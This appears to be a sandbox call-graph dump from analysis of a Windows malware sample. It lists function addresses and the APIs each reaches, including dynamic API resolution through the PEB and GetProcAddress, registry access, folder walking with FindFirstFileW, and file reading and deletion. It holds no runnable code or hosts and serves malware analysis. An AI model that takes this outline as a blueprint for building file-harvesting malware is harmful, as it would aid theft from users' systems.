9052 4031e5 4 API calls 9050->9052 9051->9031 9065 4083bb 9051->9065 9053 40826d 9052->9053 9054 4031e5 4 API calls 9053->9054 9055 408289 9054->9055 9056 4031e5 4 API calls 9055->9056 9057 4082a5 9056->9057 9058 4031e5 4 API calls 9057->9058 9059 4082c1 9058->9059 9060 4031e5 4 API calls 9059->9060 9061 4082e2 9060->9061 9062 4031e5 4 API calls 9061->9062 9063 4082ff 9062->9063 9064 4031e5 4 API calls 9063->9064 9064->9051 9113 408363 9065->9113 9068 4084ab 9068->9031 9069 4056bf 2 API calls 9070 4083f4 9069->9070 9071 408492 9070->9071 9116 40815d 9070->9116 9131 40805d 9070->9131 9072 413aca 4 API calls 9071->9072 9073 4084a0 9072->9073 9074 405695 2 API calls 9073->9074 9074->9068 9146 404b8f 9077->9146 9079 408946 9079->9037 9080 4031e5 4 API calls 9082 40887e 9080->9082 9081 40893e 9149 404a39 9081->9149 9082->9079 9082->9080 9082->9081 9084 402b7c 2 API calls 9082->9084 9084->9082 9086 402b7c 2 API calls 9085->9086 9087 4087e7 9086->9087 9088 4031e5 4 API calls 9087->9088 9090 40885a 9087->9090 9092 408802 9088->9092 9089 402bab 2 API calls 9089->9090 9097 408749 9090->9097 9093 40884d 9092->9093 9096 408853 9092->9096 9158 408522 9092->9158 9162 4084b4 9092->9162 9165 4084d4 9093->9165 9096->9089 9098 404b8f 5 API calls 9097->9098 9099 408765 9098->9099 9100 4031e5 4 API calls 9099->9100 9101 4087c7 9099->9101 9102 408522 4 API calls 9099->9102 9104 4087cf 9099->9104 9100->9099 9103 404a39 5 API calls 9101->9103 9102->9099 9103->9104 9105 4085d1 9104->9105 9106 4086c2 9105->9106 9108 4085e9 9105->9108 9106->9048 9108->9106 9109 402bab 2 API calls 9108->9109 9110 4031e5 4 API calls 9108->9110 9171 4089e6 9108->9171 9190 4086c9 9108->9190 9194 4036a3 9108->9194 9109->9108 9110->9108 9114 4031e5 4 API calls 9113->9114 9115 408386 9114->9115 9115->9068 9115->9069 9117 40816f 9116->9117 9118 4081b6 9117->9118 9119 4081fd 9117->9119 9130 4081ef 9117->9130 9121 405872 4 API calls 9118->9121 9120 405872 4 API calls 9119->9120 9122 408213 9120->9122 9123 4081cf 9121->9123 9124 405872 4 API calls 9122->9124 9125 405872 4 API calls 9123->9125 9126 408222 9124->9126 9127 4081df 9125->9127 9128 405872 4 API calls 9126->9128 9129 405872 4 API calls 9127->9129 9128->9130 9129->9130 9130->9070 9132 40808c 9131->9132 9133 4080d2 9132->9133 9134 408119 9132->9134 9145 40810b 9132->9145 9136 405872 4 API calls 9133->9136 9135 405872 4 API calls 9134->9135 9137 40812f 9135->9137 9138 4080eb 9136->9138 9139 405872 4 API calls 9137->9139 9140 405872 4 API calls 9138->9140 9141 40813e 9139->9141 9142 4080fb 9140->9142 9143 405872 4 API calls 9141->9143 9144 405872 4 API calls 9142->9144 9143->9145 9144->9145 9145->9070 9152 404a19 9146->9152 9148 404ba0 9148->9082 9155 4049ff 9149->9155 9151 404a44 9151->9079 9153 4031e5 4 API calls 9152->9153 9154 404a2c RegOpenKeyW 9153->9154 9154->9148 9156 4031e5 4 API calls 9155->9156 9157 404a12 RegCloseKey 9156->9157 9157->9151 9160 408534 9158->9160 9159 4085af 9159->9092 9160->9159 9168 4084ee 9160->9168 9163 4031e5 4 API calls 9162->9163 9164 4084c7 9163->9164 9164->9092 9166 4031e5 4 API calls 9165->9166 9167 4084e7 9166->9167 9167->9096 9169 4031e5 4 API calls 9168->9169 9170 408501 9169->9170 9170->9159 9172 4031e5 4 API calls 9171->9172 9173 408a06 9172->9173 9174 408b21 9173->9174 9175 4031e5 4 API calls 9173->9175 9174->9108 9178 408a32 9175->9178 9176 408b17 9206 403649 9176->9206 9178->9176 9197 403666 9178->9197 9182 4031e5 4 API calls 9183 408a88 9182->9183 9184 4031e5 4 API calls 9183->9184 9189 408b0e 9183->9189 9185 408ac4 9184->9185 9186 405b6f 6 API calls 9185->9186 9187 408aff 9186->9187 9187->9189 9200 408508 9187->9200 9203 40362f 9189->9203 9192 408744 9190->9192 9193 4086e2 9190->9193 9191 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9191->9193 9192->9108 9193->9191 9193->9192 9195 4031e5 4 API calls 9194->9195 9196 4036b5 9195->9196 9196->9108 9198 4031e5 4 API calls 9197->9198 9199 403679 9198->9199 9199->9182 9199->9189 9201 4031e5 4 API calls 9200->9201 9202 40851b 9201->9202 9202->9189 9204 4031e5 4 API calls 9203->9204 9205 403642 9204->9205 9205->9176 9207 4031e5 4 API calls 9206->9207 9208 40365c 9207->9208 9208->9174 9848 41045c 9849 4040bb 13 API calls 9848->9849 9850 410477 9849->9850 9851 41060b 9850->9851 9879 407851 9850->9879 9853 41048f 9854 407851 2 API calls 9853->9854 9860 410604 9853->9860 9856 4104a9 9854->9856 9855 403f9e 5 API calls 9855->9851 9861 4105e0 9856->9861 9862 405ae9 6 API calls 9856->9862 9864 4105eb 9856->9864 9865 41056f 9856->9865 9857 402bab 2 API calls 9859 4105fb 9857->9859 9858 402bab 2 API calls 9858->9860 9859->9858 9860->9855 9863 402bab 2 API calls 9861->9863 9861->9864 9862->9856 9863->9864 9864->9857 9864->9859 9865->9861 9866 4105d6 9865->9866 9868 412269 6 API calls 9865->9868 9867 402bab 2 API calls 9866->9867 9867->9861 9869 410580 9868->9869 9869->9866 9870 405872 4 API calls 9869->9870 9871 410599 9870->9871 9872 405872 4 API calls 9871->9872 9873 4105a9 9872->9873 9874 405872 4 API calls 9873->9874 9875 4105bb 9874->9875 9876 405872 4 API calls 9875->9876 9877 4105cd 9876->9877 9878 402bab 2 API calls 9877->9878 9878->9866 9880 407866 9879->9880 9881 402b7c 2 API calls 9880->9881 9882 407899 9880->9882 9881->9882 9882->9853 9270 40f561 9273 40f4b6 9270->9273 9274 413b28 7 API calls 9273->9274 9275 40f4bf 9274->9275 9276 405b6f 6 API calls 9275->9276 9277 413a58 14 API calls 9275->9277 9278 40f559 9275->9278 9279 402bab GetProcessHeap HeapFree 9275->9279 9276->9275 9277->9275 9279->9275 9283 403b64 9284 4031e5 4 API calls 9283->9284 9285 403b77 PathFileExistsW 9284->9285 9914 40d069 9915 404bee 7 API calls 9914->9915 9916 40d080 9915->9916 9917 404bee 7 API calls 9916->9917 9942 40d1e2 9916->9942 9918 40d099 9917->9918 9919 404bee 7 API calls 9918->9919 9920 40d0a7 9919->9920 9921 404ba7 4 API calls 9920->9921 9922 40d0b6 9921->9922 9923 404bee 7 API calls 9922->9923 9924 40d0c5 9923->9924 9925 404c4e 6 API calls 9924->9925 9926 40d0dc 9925->9926 9927 404bee 7 API calls 9926->9927 9928 40d0eb 9927->9928 9929 404ba7 4 API calls 9928->9929 9930 40d0fa 9929->9930 9931 404bee 7 API calls 9930->9931 9932 40d109 9931->9932 9933 404c4e 6 API calls 9932->9933 9934 40d123 9933->9934 9935 405872 4 API calls 9934->9935 9934->9942 9936 40d14a 9935->9936 9937 405872 4 API calls 9936->9937 9938 40d159 9937->9938 9939 405872 4 API calls 9938->9939 9940 40d16b 9939->9940 9941 405781 4 API calls 9940->9941 9943 40d179 9941->9943 9944 405872 4 API calls 9943->9944 9945 40d18b 9944->9945 9946 405762 4 API calls 9945->9946 9947 40d19f 9946->9947 9948 405872 4 API calls 9947->9948 9949 40d1b1 9948->9949 9950 405781 4 API calls 9949->9950 9951 40d1bf 9950->9951 9952 405872 4 API calls 9951->9952 9953 40d1d1 9952->9953 9954 405762 4 API calls 9953->9954 9954->9942 9309 40f16e 9310 4056bf 2 API calls 9309->9310 9311 40f17b 9310->9311 9312 412093 13 API calls 9311->9312 9313 40f19e 9312->9313 9314 412093 13 API calls 9313->9314 9315 40f1b6 9314->9315 9316 412093 13 API calls 9315->9316 9317 40f1cc 9316->9317 9318 412093 13 API calls 9317->9318 9319 40f1e2 9318->9319 9320 413aca 4 API calls 9319->9320 9321 40f1ef 9320->9321 9322 405695 2 API calls 9321->9322 9323 40f1fa 9322->9323 9324 40ce71 9325 413b28 7 API calls 9324->9325 9326 40ce78 9325->9326 9327 405b6f 6 API calls 9326->9327 9330 40ce83 9327->9330 9328 403fbf 7 API calls 9329 40cecc 9328->9329 9331 403d74 11 API calls 9329->9331 9341 40cefb 9329->9341 9332 403d74 11 API calls 9330->9332 9336 40cec1 9330->9336 9342 40ceba 9330->9342 9334 40cee7 9331->9334 9335 40cead 9332->9335 9333 402bab 2 API calls 9333->9336 9337 40cef4 9334->9337 9338 402bab 2 API calls 9334->9338 9340 402bab 2 API calls 9335->9340 9335->9342 9336->9328 9339 402bab 2 API calls 9337->9339 9338->9337 9339->9341 9340->9342 9342->9333 9343 406472 9344 4031e5 4 API calls 9343->9344 9345 406484 Sleep 9344->9345 9982 40ea77 9983 404bee 7 API calls 9982->9983 9984 40ea8e 9983->9984 9985 404bee 7 API calls 9984->9985 9993 40eb24 9984->9993 9986 40eaa7 9985->9986 9987 404bee 7 API calls 9986->9987 9988 40eab5 9987->9988 9989 404c4e 6 API calls 9988->9989 9990 40eacc 9989->9990 9991 405872 4 API calls 9990->9991 9990->9993 9992 40eaf2 9991->9992 9994 405872 4 API calls 9992->9994 9995 40eb01 9994->9995 9996 405872 4 API calls 9995->9996 9997 40eb13 9996->9997 9998 405762 4 API calls 9997->9998 9998->9993 10031 40f204 10032 405781 4 API calls 10031->10032 10033 40f214 10032->10033 10034 4057df 14 API calls 10033->10034 10035 40f226 10034->10035 9403 403c08 9404 4031e5 4 API calls 9403->9404 9405 403c1a DeleteFileW 9404->9405 9406 410a09 9407 41219c 15 API calls 9406->9407 9408 410a1b 9407->9408 9409 41219c 15 API calls 9408->9409 9410 410a23 9409->9410 9411 41219c 15 API calls 9410->9411 9412 410a2c 9411->9412 9413 41219c 15 API calls 9412->9413 9414 410a38 9413->9414 9415 404b22 7 API calls 9414->9415 9416 410a4c 9415->9416 9417 410a7a 9416->9417 9418 403fbf 7 API calls 9416->9418 9419 410a5c 9418->9419 9421 413a58 14 API calls 9419->9421 9424 410a71 9419->9424 9420 402bab 2 API calls 9420->9417 9422 410a6b 9421->9422 9423 402bab 2 API calls 9422->9423 9423->9424 9424->9420 10036 410d09 10037 410d56 10036->10037 10038 410d17 10036->10038 10040 413a58 14 API calls 10037->10040 10052 406642 10038->10052 10042 410d6f 10040->10042 10043 4056bf 2 API calls 10044 410d2e 10043->10044 10065 405641 10044->10065 10046 410d41 10047 413aca 4 API calls 10046->10047 10048 410d4a 10047->10048 10049 405695 2 API calls 10048->10049 10050 410d50 10049->10050 10051 4036a3 4 API calls 10050->10051 10051->10037 10053 406662 10052->10053 10054 4031e5 4 API calls 10053->10054 10055 406676 10054->10055 10069 4066bf 10055->10069 10060 4066b1 10063 4036a3 4 API calls 10060->10063 10061 4066a7 10062 4036a3 4 API calls 10061->10062 10064 4066ac 10062->10064 10063->10064 10064->10037 10064->10043 10066 40564d 10065->10066 10067 405673 10065->10067 10066->10067 10068 4056fc 4 API calls 10066->10068 10067->10046 10068->10067 10070 4031e5 4 API calls 10069->10070 10071 4066dc 10070->10071 10072 4066f6 SetLastError 10071->10072 10073 406708 GetLastError 10071->10073 10074 406693 10072->10074 10073->10074 10075 406713 10073->10075 10091 406455 10074->10091 10076 4031e5 4 API calls 10075->10076 10077 406725 10076->10077 10077->10074 10078 4031e5 4 API calls 10077->10078 10079 40673f 10078->10079 10080 406753 10079->10080 10081 406749 10079->10081 10083 4031e5 4 API calls 10080->10083 10082 4036a3 4 API calls 10081->10082 10082->10074 10084 406761 10083->10084 10085 40678a 10084->10085 10086 40677c 10084->10086 10087 4036a3 4 API calls 10085->10087 10088 4036a3 4 API calls 10086->10088 10087->10074 10089 406781 10088->10089 10090 4036a3 4 API calls 10089->10090 10090->10074 10092 4031e5 4 API calls 10091->10092 10093 406468 10092->10093 10093->10060 10093->10061 9425 40c509 9426 412093 13 API calls 9425->9426 9427 40c51e 9426->9427 9434 40910d 9435 404b22 7 API calls 9434->9435 9436 409124 9435->9436 9437 40917a 9436->9437 9438 405b6f 6 API calls 9436->9438 9439 40913e 9438->9439 9440 409173 9439->9440 9442 404b22 7 API calls 9439->9442 9441 402bab 2 API calls 9440->9441 9441->9437 9443 409153 9442->9443 9444 409408 18 API calls 9443->9444 9448 40916a 9443->9448 9446 409164 9444->9446 9445 402bab 2 API calls 9445->9440 9447 402bab 2 API calls 9446->9447 9447->9448 9448->9445 9452 410410 9453 4056bf 2 API calls 9452->9453 9454 41041b 9453->9454 9455 412093 13 API calls 9454->9455 9456 41043c 9455->9456 9457 413aca 4 API calls 9456->9457 9458 410449 9457->9458 9459 405695 2 API calls 9458->9459 9460 410454 9459->9460 9487 40c71a 9488 41219c 15 API calls 9487->9488 9489 40c728 9488->9489 10149 410b1a 10150 404bee 7 API calls 10149->10150 10151 410b31 10150->10151 10152 404bee 7 API calls 10151->10152 10162 410c6d 10151->10162 10153 410b5a 10152->10153 10154 404bee 7 API calls 10153->10154 10155 410b69 10154->10155 10156 404bee 7 API calls 10155->10156 10157 410b78 10156->10157 10158 404ba7 4 API calls 10157->10158 10159 410b86 10158->10159 10160 404ba7 4 API calls 10159->10160 10161 410b95 10160->10161 10161->10162 10163 405872 4 API calls 10161->10163 10164 410bd7 10163->10164 10165 405872 4 API calls 10164->10165 10166 410be8 10165->10166 10167 405872 4 API calls 10166->10167 10168 410bf9 10167->10168 10169 405781 4 API calls 10168->10169 10170 410c07 10169->10170 10171 405781 4 API calls 10170->10171 10175 410c15 10171->10175 10172 410c4e 10173 405762 4 API calls 10172->10173 10174 410c60 10173->10174 10174->10162 10176 403f9e 5 API calls 10174->10176 10175->10172 10182 405e5a 10175->10182 10176->10162 10179 4040bb 13 API calls 10180 410c44 10179->10180 10181 402bab 2 API calls 10180->10181 10181->10172 10183 402b7c 2 API calls 10182->10183 10184 405e72 10183->10184 10185 4031e5 4 API calls 10184->10185 10187 405ea3 10184->10187 10186 405e94 10185->10186 10186->10187 10188 402bab 2 API calls 10186->10188 10187->10172 10187->10179 10188->10187 10189 40f81c 10190 404bee 7 API calls 10189->10190 10192 40f833 10190->10192 10191 40f94f 10192->10191 10193 404bee 7 API calls 10192->10193 10194 40f85c 10193->10194 10195 404bee 7 API calls 10194->10195 10196 40f86b 10195->10196 10197 404bee 7 API calls 10196->10197 10198 40f87a 10197->10198 10199 404bee 7 API calls 10198->10199 10200 40f888 10199->10200 10201 404ba7 4 API calls 10200->10201 10202 40f897 10201->10202 10202->10191 10203 405872 4 API calls 10202->10203 10204 40f8d8 10203->10204 10205 405872 4 API calls 10204->10205 10206 40f8ea 10205->10206 10207 405872 4 API calls 10206->10207 10208 40f8fa 10207->10208 10209 405872 4 API calls 10208->10209 10210 40f90c 10209->10210 10211 405781 4 API calls 10210->10211 10212 40f91d 10211->10212 10213 4040bb 13 API calls 10212->10213 10214 40f92d 10213->10214 10215 405762 4 API calls 10214->10215 10216 40f93f 10215->10216 10216->10191 10217 403f9e 5 API calls 10216->10217 10217->10191 9502 402c1f 9503 4031e5 4 API calls 9502->9503 9504 402c31 LoadLibraryW 9503->9504 10227 407e1f 10228 407e61 10227->10228 10229 407e2c 10227->10229 10231 407eb6 10228->10231 10232 407ea6 10228->10232 10239 405872 4 API calls 10228->10239 10233 402bab 2 API calls 10229->10233 10234 407e3e 10229->10234 10237 407e51 10229->10237 10230 407ed4 10236 402bab 2 API calls 10231->10236 10231->10237 10232->10231 10235 402bab 2 API calls 10232->10235 10233->10234 10234->10230 10238 402bab 2 API calls 10234->10238 10235->10231 10236->10237 10237->10230 10240 402bab 2 API calls 10237->10240 10238->10237 10241 407e86 10239->10241 10240->10230 10242 405872 4 API calls 10241->10242 10243 407e96 10242->10243 10244 405872 4 API calls 10243->10244 10244->10232 10245 40fa23 10246 40fa39 10245->10246 10247 410293 10246->10247 10248 405b6f 6 API calls 10246->10248 10249 40ffcc 10248->10249 10249->10247 10250 4040bb 13 API calls 10249->10250 10251 40ffeb 10250->10251 10252 41028c 10251->10252 10254 402b7c 2 API calls 10251->10254 10300 41027d 10251->10300 10253 402bab 2 API calls 10252->10253 10253->10247 10256 41001e 10254->10256 10255 403f9e 5 API calls 10255->10252 10257 40a423 4 API calls 10256->10257 10256->10300 10258 41004a 10257->10258 10259 4031e5 4 API calls 10258->10259 10260 41005c 10259->10260 10261 4031e5 4 API calls 10260->10261 10262 410079 10261->10262 10263 4031e5 4 API calls 10262->10263 10264 410096 10263->10264 10265 4031e5 4 API calls 10264->10265 10266 4100b0 10265->10266 10267 4031e5 4 API calls 10266->10267 10268 4100cd 10267->10268 10269 4031e5 4 API calls 10268->10269 10270 4100ea 10269->10270 10301 412516 10270->10301 10272 4100fd 10273 40642c 5 API calls 10272->10273 10274 41013e 10273->10274 10275 410142 10274->10275 10276 41019f 10274->10276 10277 40488c 5 API calls 10275->10277 10280 4031e5 4 API calls 10276->10280 10278 410151 10277->10278 10279 41019c 10278->10279 10281 404866 4 API calls 10278->10281 10282 41022a 10279->10282 10284 40642c 5 API calls 10279->10284 10293 4101bb 10280->10293 10283 410163 10281->10283 10288 413a58 14 API calls 10282->10288 10285 41018e 10283->10285 10287 406c4c 6 API calls 10283->10287 10286 410201 10284->10286 10289 403c40 5 API calls 10285->10289 10290 410205 10286->10290 10291 41022f 10286->10291 10294 410178 10287->10294 10295 41026e 10288->10295 10289->10279 10296 4126a7 7 API calls 10290->10296 10304 4125db 10291->10304 10297 4031e5 4 API calls 10293->10297 10298 406c4c 6 API calls 10294->10298 10299 402bab 2 API calls 10295->10299 10296->10282 10297->10279 10298->10285 10299->10300 10300->10255 10302 4031e5 4 API calls 10301->10302 10303 412539 10302->10303 10303->10272 10305 40488c 5 API calls 10304->10305 10306 4125ec 10305->10306 10307 41269f 10306->10307 10308 4031e5 4 API calls 10306->10308 10307->10282 10309 412609 10308->10309 10310 41268f 10309->10310 10311 4031e5 4 API calls 10309->10311 10312 403c40 5 API calls 10310->10312 10313 41262a 10311->10313 10312->10307 10320 412675 10313->10320 10321 4124f1 10313->10321 10315 4031e5 4 API calls 10315->10310 10317 412663 10319 4031e5 4 API calls 10317->10319 10318 4124f1 4 API calls 10318->10317 10319->10320 10320->10315 10322 4031e5 4 API calls 10321->10322 10323 412503 10322->10323 10323->10317 10323->10318 10335 410927 10336 4044ee 8 API calls 10335->10336 10337 41093d 10336->10337 10338 4109a4 10337->10338 10339 4056bf 2 API calls 10337->10339 10342 410954 10339->10342 10340 4044ee 8 API calls 10340->10342 10342->10340 10343 410990 10342->10343 10344 402bab 2 API calls 10342->10344 10350 41080e 10342->10350 10345 413aca 4 API calls 10343->10345 10344->10342 10346 410998 10345->10346 10347 405695 2 API calls 10346->10347 10348 41099e 10347->10348 10349 402bab 2 API calls 10348->10349 10349->10338 10351 410821 10350->10351 10361 41091f 10351->10361 10362 410701 10351->10362 10354 405872 4 API calls 10355 410900 10354->10355 10356 405872 4 API calls 10355->10356 10357 41090d 10356->10357 10358 405872 4 API calls 10357->10358 10359 410919 10358->10359 10360 402bab 2 API calls 10359->10360 10360->10361 10361->10342 10363 405f08 4 API calls 10362->10363 10365 410713 10363->10365 10364 410804 10364->10354 10364->10361 10365->10364 10366 402b7c 2 API calls 10365->10366 10368 410748 10366->10368 10367 402bab 2 API calls 10367->10364 10369 402b7c 2 API calls 10368->10369 10371 4107fd 10368->10371 10372 4107ad 10369->10372 10370 402bab 2 API calls 10370->10371 10371->10367 10372->10370 9572 40f12f 9573 41219c 15 API calls 9572->9573 9574 40f13f 9573->9574 9575 41219c 15 API calls 9574->9575 9576 40f14c 9575->9576 9577 41219c 15 API calls 9576->9577 9578 40f159 9577->9578 9579 41219c 15 API calls 9578->9579 9580 40f166 9579->9580 9587 40ed35 9588 4056bf 2 API calls 9587->9588 9589 40ed42 9588->9589 9590 412093 13 API calls 9589->9590 9591 40ed63 9590->9591 9592 412093 13 API calls 9591->9592 9593 40ed73 9592->9593 9594 413aca 4 API calls 9593->9594 9595 40ed80 9594->9595 9596 405695 2 API calls 9595->9596 9597 40ed8e 9596->9597 8126 40f3c5 8131 41219c 8126->8131 8129 41219c 15 API calls 8130 40f3e1 8129->8130 8132 4121b1 8131->8132 8148 40f3d3 8131->8148 8133 4121be 8132->8133 8136 4121c5 8132->8136 8180 413ba4 8133->8180 8135 4121ca 8149 404056 8135->8149 8136->8135 8142 412210 8136->8142 8138 4121c3 8138->8148 8157 405b6f 8138->8157 8141 41224d 8145 402bab 2 API calls 8141->8145 8141->8148 8142->8148 8185 403fbf 8142->8185 8145->8148 8148->8129 8196 402b7c GetProcessHeap RtlAllocateHeap 8149->8196 8151 404066 8154 404095 8151->8154 8198 4031e5 8151->8198 8154->8138 8155 404099 8156 402bab 2 API calls 8155->8156 8156->8154 8158 405b7d 8157->8158 8159 402b7c 2 API calls 8158->8159 8160 405b99 8159->8160 8169 405c02 8160->8169 8234 4059b8 8160->8234 8162 405c09 8165 402bab 2 API calls 8162->8165 8163 405bba 8163->8162 8164 402b7c 2 API calls 8163->8164 8166 405bdd 8164->8166 8165->8169 8166->8162 8167 405be4 8166->8167 8168 402bab 2 API calls 8167->8168 8168->8169 8169->8141 8170 413a58 8169->8170 8171 413a63 8170->8171 8179 412245 8170->8179 8171->8179 8237 405781 8171->8237 8174 405781 4 API calls 8175 413aa0 8174->8175 8240 4057df 8175->8240 8178 405781 4 API calls 8178->8179 8193 402bab 8179->8193 8181 413bad 8180->8181 8182 404056 7 API calls 8181->8182 8184 413bb8 8181->8184 8183 413bc5 8182->8183 8183->8138 8184->8138 8186 402b7c 2 API calls 8185->8186 8188 403fcf 8186->8188 8187 403ff4 8187->8138 8188->8187 8359 403b98 8188->8359 8191 403ff8 GetLastError 8192 402bab 2 API calls 8191->8192 8192->8187 8194 402bb4 GetProcessHeap HeapFree 8193->8194 8195 402bc6 8193->8195 8194->8195 8195->8141 8197 402b98 8196->8197 8197->8151 8199 403236 8198->8199 8202 4031f3 8198->8202 8209 4030a5 8199->8209 8201 403224 8204 403258 SHGetFolderPathW 8201->8204 8206 4031e5 4 API calls 8201->8206 8202->8199 8203 403208 8202->8203 8215 403263 8203->8215 8204->8154 8204->8155 8206->8204 8207 40320d 8207->8204 8208 4030a5 4 API calls 8207->8208 8208->8201 8221 402ca4 8209->8221 8211 4030b0 8212 4030b5 8211->8212 8225 4030c4 8211->8225 8212->8201 8216 40326d 8215->8216 8217 402b7c 2 API calls 8216->8217 8220 4032b7 8216->8220 8218 40328c 8217->8218 8219 402b7c 2 API calls 8218->8219 8219->8220 8220->8207 8222 403079 8221->8222 8223 40307c 8222->8223 8229 40317b GetPEB 8222->8229 8223->8211 8226 4030eb 8225->8226 8227 4030c0 8226->8227 8231 402c03 8226->8231 8227->8201 8230 40319b 8229->8230 8230->8223 8232 4031e5 3 API calls 8231->8232 8233 402c15 GetProcAddress 8232->8233 8233->8227 8235 4031e5 4 API calls 8234->8235 8236 4059cb 8235->8236 8236->8163 8255 405797 8237->8255 8239 405792 8239->8174 8241 4057eb 8240->8241 8254 405832 8240->8254 8241->8254 8265 4040bb 8241->8265 8244 405839 8245 405853 8244->8245 8292 405627 8244->8292 8303 405762 8245->8303 8246 40582c 8289 403f9e 8246->8289 8253 403f9e 5 API calls 8253->8254 8254->8178 8254->8179 8256 4057a1 8255->8256 8258 4057bd 8255->8258 8256->8258 8259 4056fc 8256->8259 8258->8239 8260 405714 8259->8260 8261 402b7c 2 API calls 8260->8261 8263 405730 8261->8263 8262 405752 8262->8258 8263->8262 8264 402bab 2 API calls 8263->8264 8264->8262 8266 4031e5 4 API calls 8265->8266 8267 4040d5 CreateFileW 8266->8267 8268 4040f8 8267->8268 8269 40418d 8267->8269 8270 4031e5 4 API calls 8268->8270 8271 404183 8269->8271 8309 403c90 8269->8309 8275 404105 8270->8275 8271->8244 8271->8246 8271->8254 8280 4031e5 4 API calls 8275->8280 8288 40416d 8275->8288 8278 4040bb 10 API calls 8281 4041c8 8278->8281 8279 402bab 2 API calls 8279->8271 8282 404131 VirtualAlloc 8280->8282 8281->8279 8283 404142 8282->8283 8282->8288 8284 4031e5 4 API calls 8283->8284 8285 40414f ReadFile 8284->8285 8286 404160 8285->8286 8285->8288 8287 4031e5 4 API calls 8286->8287 8287->8288 8306 403c40 8288->8306 8290 4031e5 4 API calls 8289->8290 8291 403fb1 VirtualFree 8290->8291 8291->8254 8293 4031e5 4 API calls 8292->8293 8294 40563a 8293->8294 8295 405872 8294->8295 8297 405881 8295->8297 8296 4058bc 8299 405797 4 API calls 8296->8299 8301 4058af 8296->8301 8297->8296 8356 4058d4 8297->8356 8299->8301 8301->8245 8302 405781 4 API calls 8302->8296 8304 405781 4 API calls 8303->8304 8305 405770 8304->8305 8305->8253 8307 4031e5 4 API calls 8306->8307 8308 403c52 CloseHandle 8307->8308 8308->8271 8310 403ca3 8309->8310 8313 403caa 8309->8313 8336 405dc5 8310->8336 8312 404056 7 API calls 8314 403cbe 8312->8314 8313->8312 8315 403d3a 8313->8315 8316 403d2e 8314->8316 8317 403d17 8314->8317 8318 403ccf 8314->8318 8315->8271 8332 403c59 8315->8332 8316->8315 8319 402bab 2 API calls 8316->8319 8320 405b6f 6 API calls 8317->8320 8321 405b6f 6 API calls 8318->8321 8319->8315 8322 403d14 8320->8322 8323 403cdd 8321->8323 8326 402bab 2 API calls 8322->8326 8324 405b6f 6 API calls 8323->8324 8325 403cee 8324->8325 8325->8322 8341 403d4d 8325->8341 8326->8316 8329 403d0b 8331 402bab 2 API calls 8329->8331 8331->8322 8333 403c21 8332->8333 8334 4031e5 4 API calls 8333->8334 8335 403c33 8334->8335 8335->8278 8335->8281 8350 406799 8336->8350 8338 405dd5 8339 402b7c 2 API calls 8338->8339 8340 405dfe 8339->8340 8340->8313 8353 403bb7 8341->8353 8343 403cfe 8343->8329 8344 403c62 8343->8344 8345 403d4d 5 API calls 8344->8345 8346 403c6d 8345->8346 8347 403c72 8346->8347 8348 4031e5 4 API calls 8346->8348 8347->8329 8349 403c87 CreateDirectoryW 8348->8349 8349->8329 8351 4031e5 4 API calls 8350->8351 8352 4067ad 8351->8352 8352->8338 8354 4031e5 4 API calls 8353->8354 8355 403bc9 GetFileAttributesW 8354->8355 8355->8343 8357 405797 4 API calls 8356->8357 8358 4058a8 8357->8358 8358->8301 8358->8302 8360 4031e5 4 API calls 8359->8360 8361 403baa 8360->8361 8361->8187 8361->8191 9750 40ebc6 9751 4040bb 13 API calls 9750->9751 9752 40ebdf 9751->9752 9758 40ecd7 9752->9758 9770 407795 9752->9770 9755 40eccd 9756 403f9e 5 API calls 9755->9756 9756->9758 9757 4056bf 2 API calls 9769 40ec12 9757->9769 9759 40ecb5 9760 402bab 2 API calls 9759->9760 9761 40ecbd 9760->9761 9762 413aca 4 API calls 9761->9762 9763 40ecc7 9762->9763 9765 405695 2 API calls 9763->9765 9764 407908 GetProcessHeap RtlAllocateHeap 9764->9769 9765->9755 9767 402bab GetProcessHeap HeapFree 9767->9769 9768 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9768->9769 9769->9759 9769->9764 9769->9767 9769->9768 9781 412269 9769->9781 9771 4077ab 9770->9771 9777 4077b3 9771->9777 9788 405ae9 9771->9788 9773 4077e1 9774 407802 9773->9774 9775 4077f8 9773->9775 9773->9777 9778 402b7c 2 API calls 9774->9778 9776 402bab 2 API calls 9775->9776 9776->9777 9777->9755 9777->9757 9780 407811 9778->9780 9779 402bab 2 API calls 9779->9777 9780->9779 9804 40374e 9781->9804 9784 412299 9784->9769 9785 4037be 4 API calls 9786 412291 9785->9786 9787 402bab 2 API calls 9786->9787 9787->9784 9789 405af7 9788->9789 9790 402b7c 2 API calls 9789->9790 9791 405b03 9790->9791 9797 405b5a 9791->9797 9801 405998 9791->9801 9793 405b21 9794 405b61 9793->9794 9796 402b7c 2 API calls 9793->9796 9795 402bab 2 API calls 9794->9795 9795->9797 9798 405b39 9796->9798 9797->9773 9798->9794 9799 405b40 9798->9799 9800 402bab 2 API calls 9799->9800 9800->9797 9802 4031e5 4 API calls 9801->9802 9803 4059ab 9802->9803 9803->9793 9805 402b7c 2 API calls 9804->9805 9806 40375f 9805->9806 9807 4031e5 4 API calls 9806->9807 9810 4037a3 9806->9810 9808 40378f 9807->9808 9809 402bab 2 API calls 9808->9809 9808->9810 9809->9810 9810->9784 9810->9785 8959 410cd1 8964 412093 8959->8964 8962 412093 13 API calls 8963 410cff 8962->8963 8967 4120a5 8964->8967 8985 410cf1 8964->8985 8965 4120b3 8966 404056 7 API calls 8965->8966 8968 4120ba 8966->8968 8967->8965 8971 412100 8967->8971 8969 405b6f 6 API calls 8968->8969 8970 412152 8968->8970 8968->8985 8972 412125 8969->8972 8986 403d74 8970->8986 8974 403fbf 7 API calls 8971->8974 8971->8985 8972->8970 8977 412139 8972->8977 8978 41214d 8972->8978 8974->8968 8976 41218c 8981 402bab 2 API calls 8976->8981 8976->8985 8980 402bab 2 API calls 8977->8980 8982 402bab 2 API calls 8978->8982 8979 402bab 2 API calls 8979->8976 8983 41213e 8980->8983 8981->8985 8982->8970 8984 402bab 2 API calls 8983->8984 8984->8985 8985->8962 8987 403d87 8986->8987 8988 403ea3 8987->8988 8989 405b6f 6 API calls 8987->8989 8990 405b6f 6 API calls 8988->8990 8991 403da3 8989->8991 8992 403eb9 8990->8992 8991->8988 8994 4031e5 4 API calls 8991->8994 8993 403f6f 8992->8993 8995 4031e5 4 API calls 8992->8995 8993->8976 8993->8979 8996 403dbc FindFirstFileW 8994->8996 8997 403ed3 FindFirstFileW 8995->8997 8998 403e9c 8996->8998 9017 403dd1 8996->9017 8999 403f8d 8997->8999 9016 403ee8 8997->9016 9000 402bab 2 API calls 8998->9000 